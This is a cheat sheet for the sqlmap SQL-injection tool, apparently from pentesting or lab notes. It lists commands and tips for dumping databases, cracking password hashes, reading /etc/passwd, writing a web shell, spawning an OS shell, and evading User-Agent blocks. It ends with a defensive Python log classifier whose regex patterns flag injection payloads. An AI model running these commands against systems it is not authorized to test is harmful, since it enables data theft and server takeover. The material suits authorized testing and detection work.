SQLmap

| Command | Description |
| --- | --- |
| `sqlmap -r email.request --level 5 --risk 3 --batch --dump -p <parameter> --dbs --threads 10 --technique=BEU` | Basic usage (`-p` needs the name of the parameter to test) |
| `sqlmap 'https://admin-portal.europacorp.htb/login.php' --data 'email=nika@nika.com&password=nika' --level 5 --risk 3 --batch --dump -p email --dbs --threads 10 --technique=BEU` | POST request naming the injection parameter with `-p` (an asterisk inside a parameter value marks a custom injection point instead) |
| `sqlmap -hh` | View the advanced help menu (`-h` shows the basic one) |
| `sqlmap --force-ssl` | Force SSL/TLS when the target is served over HTTPS |
| `sqlmap -u "http://www.example.com/vuln.php?id=1" --batch` | Run SQLMap without asking for user input |
| `sqlmap 'http://www.example.com/' --data 'uid=1&name=test'` | SQLMap with POST request |
| `sqlmap -r req.txt` | Passing an HTTP request file to SQLMap |
| `sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'` | Specifying a cookie header |
| `sqlmap -u www.target.com --data='id=1' --method PUT` | Specifying a PUT request |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt` | Store traffic to an output file |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch` | Specify verbosity level |
| `sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"` | Specifying a prefix or suffix |
| `sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3` | Specifying the level and risk |
| `sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba` | Basic DB enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --tables -D testdb` | Table enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname` | Table/row enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"` | Conditional enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --schema` | Database schema enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --search -T user` | Searching for data |
| `sqlmap -u "http://www.example.com/?id=1" --passwords --batch` | Password enumeration and cracking |
| `sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"` | Anti-CSRF token bypass |
| `sqlmap --list-tampers` | List all tamper scripts |
| `sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba` | Check for DBA privileges |
| `sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"` | Reading a local file |
| `sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"` | Writing a file |
| `sqlmap -u "http://www.example.com/?id=1" --os-shell` | Spawning an OS shell |

Tips

  1. --no-cast: Avoids automatic data conversion, keeping it in its original format.
  2. -T <tablename>: Focuses on a specific table, useful for saving time when investigating a known table.
  3. -D: Sets the database name and helps reduce errors when you know the correct database.
  4. --titles: Bases SQL injection detection on page titles, useful when titles differentiate between true and false answers.
  5. --text-only: Ignores HTML tags, focusing only on the visible text of the answers.
  6. --string="success": Identifies true answers by the presence of a specific string, such as "success".
  7. --batch: Runs sqlmap automatically without manual interactions, ideal for scripts or quick use.
  8. --dump: Extracts data from tables after finding a vulnerability, showing the impact of SQL injection.
  9. --level=1-5: Increases the number and diversity of tests, including less common techniques for a more detailed scan.
  10. --risk=1-3: Expands the set of test vectors, including those with higher risks, for in-depth investigations.
  11. --fresh-queries: This parameter instructs sqlmap not to resume the previous session and to treat each execution as a new session.
  12. -v 3: Sets the verbosity level to display the payloads used, which helps understand which techniques are most effective.
  13. -p: Specifies the parameter to test for injection (GET, POST, or other). Ex: -p id
  14. --tables: Shows the available tables in the database. You need to specify -D <database>.
  15. --start=2 --stop=3: Defines the first and last row to be pulled.
  16. --dump-all: Use when you need to extract data from all tables in all databases. Ideal for a complete analysis, but can be time-consuming.
  17. --exclude-sysdbs: Use to ignore system databases. Good for focusing on specific application data and avoiding unnecessary security alerts.
  18. --where="<username> LIKE 'f%'": Use to filter extracted data with a specific WHERE condition. Useful for focusing on specific records and saving time.
  19. -C: Defines the specific column(s) you want to search or dump.
  20. --search: Used to search for specific objects in the database, such as tables, columns, or even data within tables, based on provided search criteria. Ex: --search -T users -C password
  21. --schema: Obtains the database schema, which includes information about the tables, columns, data types, and potentially other schema properties.
  22. --random-agent: Some systems block the default sqlmap User-Agent (sqlmap/<version> ...). The --random-agent option picks a random browser User-Agent instead, so a defence that keys only on the User-Agent header will miss the scan.
  23. --passwords: Used to attempt to retrieve the password hashes of the target system's database users.
  24. --data: Only for the POST method. Provide the data in the format of key-value pairs, as in an HTML form. For example: --data="username=admin&password=secret".
  25. --technique=BEU: Limits testing to specific techniques. This allows you to focus on methods that are generally faster and less likely to cause significant disruptions to the target system.
  • B for Boolean-based blind SQL injection
  • E for Error-based SQL injection
  • U for UNION query SQL injection
  • T for Time-based blind SQL injection
  • S for Stacked query SQL injection
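The --random-agent tip and the technique letters above both matter on the defending side: a User-Agent block alone is bypassed by --random-agent, but the payloads each technique sends still land in the web server log. The following is an added example (not from the original page or the sqlmap project) that classifies combined-format access log lines by technique letter and aggregates per source IP; the log lines, IPs and signature patterns are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Payload markers for the five sqlmap technique letters (B/E/U/T/S). A hand-picked
# subset for illustration, not an exhaustive signature set.
TECHNIQUE_MARKERS = {
    "B": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),                # boolean-based blind
    "E": re.compile(r"\b(extractvalue|updatexml|convert\(int)", re.I),  # error-based
    "U": re.compile(r"union\s+(all\s+)?select", re.I),                  # UNION query
    "T": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I),   # time-based blind
    "S": re.compile(r";\s*(select|insert|update|delete|drop|exec)\b", re.I),  # stacked
}
# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"$')

# Constructed sample lines (not real traffic): two requests carrying the stock sqlmap
# User-Agent, one with a browser UA as --random-agent would send, and one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /vuln.php?id=1%20AND%201%3D1 HTTP/1.1" '
    '200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /vuln.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" '
    '200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '198.51.100.7 - - [10/Oct/2023:14:02:11 +0000] "GET /vuln.php?id=1%27%20AND%20SLEEP%285%29-- HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '192.0.2.9 - - [10/Oct/2023:14:03:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (ip, technique letters seen, stock sqlmap UA?) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))  # match on the decoded query string
    techniques = {t for t, rx in TECHNIQUE_MARKERS.items() if rx.search(decoded)}
    return m.group("ip"), techniques, m.group("ua").lower().startswith("sqlmap/")

def summarize(lines):
    """Aggregate per source IP so a --random-agent scan still surfaces via its payloads."""
    report = {}
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        ip, techniques, stock_ua = parsed
        entry = report.setdefault(ip, {"techniques": set(), "stock_ua": False, "hits": 0})
        entry["techniques"] |= techniques
        entry["stock_ua"] = entry["stock_ua"] or stock_ua
        entry["hits"] += 1 if techniques else 0
    return report
```

The second source IP never sends the stock User-Agent yet is still reported with technique T, which is the point of pairing payload inspection with the header check.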